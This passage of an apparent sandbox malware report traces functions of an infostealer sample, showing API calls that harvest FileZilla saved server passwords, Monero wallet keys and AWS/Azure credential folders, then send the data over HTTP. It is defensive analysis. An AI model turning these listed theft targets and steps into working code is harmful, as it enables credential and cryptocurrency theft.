                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c387637aad3a47a1d78d03f9572df1a50e217a5f3ed0e86ec28a48af85e93862
                              • Instruction ID: b14684f2d490170cd0cb7e8f20027a47a72a947043478ceb34816e8e92ea17ea
                              • Opcode Fuzzy Hash: c387637aad3a47a1d78d03f9572df1a50e217a5f3ed0e86ec28a48af85e93862
                              • Instruction Fuzzy Hash: 6331D3F3D086109FF3189A29DC4536AB7E5EFC4720F16C63DEAD897384E9385C018696
                              Function 001D9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 001D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,001E0DBA,001E0DB7,001E0DB6,001E0DB3), ref: 001D0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 001D0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001D03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 001D0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001D0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001D0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 001D0571
                              • lstrcat.KERNEL32(?,url: ), ref: 001D0580
                              • lstrcat.KERNEL32(?,00000000), ref: 001D0593
                              • lstrcat.KERNEL32(?,001E1678), ref: 001D05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001D05B5
                              • lstrcat.KERNEL32(?,001E167C), ref: 001D05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001D05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001D05E6
                              • lstrcat.KERNEL32(?,001E1688), ref: 001D05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 001D0604
                              • lstrcat.KERNEL32(?,00000000), ref: 001D0617
                              • lstrcat.KERNEL32(?,001E1698), ref: 001D0626
                              • lstrcat.KERNEL32(?,001E169C), ref: 001D0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 29a2dc6766bc0f5521f78971a7ca81630ee790383eaa77ca01f88278d74d3162
                              • Instruction ID: c1f8b3d8e6149ae0aec6b88e9107466df2d40286c3447a3cdd0c40dc5aaf1f1c
                              • Opcode Fuzzy Hash: 29a2dc6766bc0f5521f78971a7ca81630ee790383eaa77ca01f88278d74d3162
                              • Instruction Fuzzy Hash: 8CD11172900248ABCB04EBF4DD96EEE7338BF68301F808519F502B7191DF74AA45DB66
                              Function 001C5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C59F8
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014AEAD8,00000000,?,014AA7B0,00000000,?,001E1A1C), ref: 001C5E71
                              • lstrlen.KERNEL32(00000000), ref: 001C5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001C5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C5E9A
                              • lstrlen.KERNEL32(00000000), ref: 001C5EAF
                              • lstrlen.KERNEL32(00000000), ref: 001C5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 001C5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001C5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FBD
                              • HttpOpenRequestA.WININET(00000000,014AE9C8,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C5BF8
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 2e2ed8f9042e4a10c2b079edfa5d6521fd530cf5ddf87afff1f333820c1528fc
                              • Instruction ID: ed9f0a8606281f4ad8cade0029b5ed36666ac048492b81f12fc19aa194dd6780
                              • Opcode Fuzzy Hash: 2e2ed8f9042e4a10c2b079edfa5d6521fd530cf5ddf87afff1f333820c1528fc
                              • Instruction Fuzzy Hash: 0F122271820168ABDB19EBA0DCA5FEE7378BF24701F8041AAF50673191EF706A49CF55
                              Function 001CCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001CD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001CD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD208
                              • lstrcat.KERNEL32(?,001E1478), ref: 001CD217
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD22A
                              • lstrcat.KERNEL32(?,001E147C), ref: 001CD239
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD24C
                              • lstrcat.KERNEL32(?,001E1480), ref: 001CD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD26E
                              • lstrcat.KERNEL32(?,001E1484), ref: 001CD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD290
                              • lstrcat.KERNEL32(?,001E1488), ref: 001CD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD2B2
                              • lstrcat.KERNEL32(?,001E148C), ref: 001CD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD2D4
                              • lstrcat.KERNEL32(?,001E1490), ref: 001CD2E3
                                • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                                • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                              • lstrlen.KERNEL32(?), ref: 001CD32A
                              • lstrlen.KERNEL32(?), ref: 001CD339
                                • Part of subcall function 001DAA70: StrCmpCA.SHLWAPI(014A8F48,001CA7A7,?,001CA7A7,014A8F48), ref: 001DAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 001CD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: e59ce0a23df345db5d1233e381c2aa42d2b400aa100c659202f671ce5d0d9efb
                              • Instruction ID: 6e1abb283560617c1ae71b049d04e74a1a643cc3083ea037552e01a0b120b843
                              • Opcode Fuzzy Hash: e59ce0a23df345db5d1233e381c2aa42d2b400aa100c659202f671ce5d0d9efb
                              • Instruction Fuzzy Hash: B0E16F72810218ABCB04FBA0DD96EEE7338BF24301F804169F507B7291DF35AA15DB66
                              Function 001CC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014AD2C0,00000000,?,001E144C,00000000,?,?), ref: 001CCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001CCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 001CCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001CCAD9
                              • StrStrA.SHLWAPI(?,014AD140,001E0B52), ref: 001CCAF7
                              • StrStrA.SHLWAPI(00000000,014AD380), ref: 001CCB1E
                              • StrStrA.SHLWAPI(?,014ADA60,00000000,?,001E1458,00000000,?,00000000,00000000,?,014A8FC8,00000000,?,001E1454,00000000,?), ref: 001CCCA2
                              • StrStrA.SHLWAPI(00000000,014ADD20), ref: 001CCCB9
                                • Part of subcall function 001CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                                • Part of subcall function 001CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                              • StrStrA.SHLWAPI(?,014ADD20,00000000,?,001E145C,00000000,?,00000000,014A90F8), ref: 001CCD5A
                              • StrStrA.SHLWAPI(00000000,014A9118), ref: 001CCD71
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                                • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                              • lstrlen.KERNEL32(00000000), ref: 001CCE44
                              • CloseHandle.KERNEL32(00000000), ref: 001CCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                              • Instruction ID: 528c9720f4476e76c469a1afc1f65a996345cc9b218cbd37d2cfc54a34d5042b
                              • Opcode Fuzzy Hash: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                              • Instruction Fuzzy Hash: 09E14771C00158ABDB14EBA4DD95FEE7778AF24300F80416AF50677291EF306A4ACF66
                              Function 001D8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • RegOpenKeyExA.ADVAPI32(00000000,014AB748,00000000,00020019,00000000,001E05B6), ref: 001D83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                              • wsprintfA.USER32 ref: 001D8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                              • Instruction ID: c9df9a9b01e2b92fdee8e068cd88abf40695c5a031d056df881d44b5eb0bb462
                              • Opcode Fuzzy Hash: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                              • Instruction Fuzzy Hash: 75811F71910228ABDB28DF54CD95FEA77B8FF18700F4082D9E509A6240DF71AB85CF95
                              Function 001D4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 001D4DCD
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                                • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 001D4E59
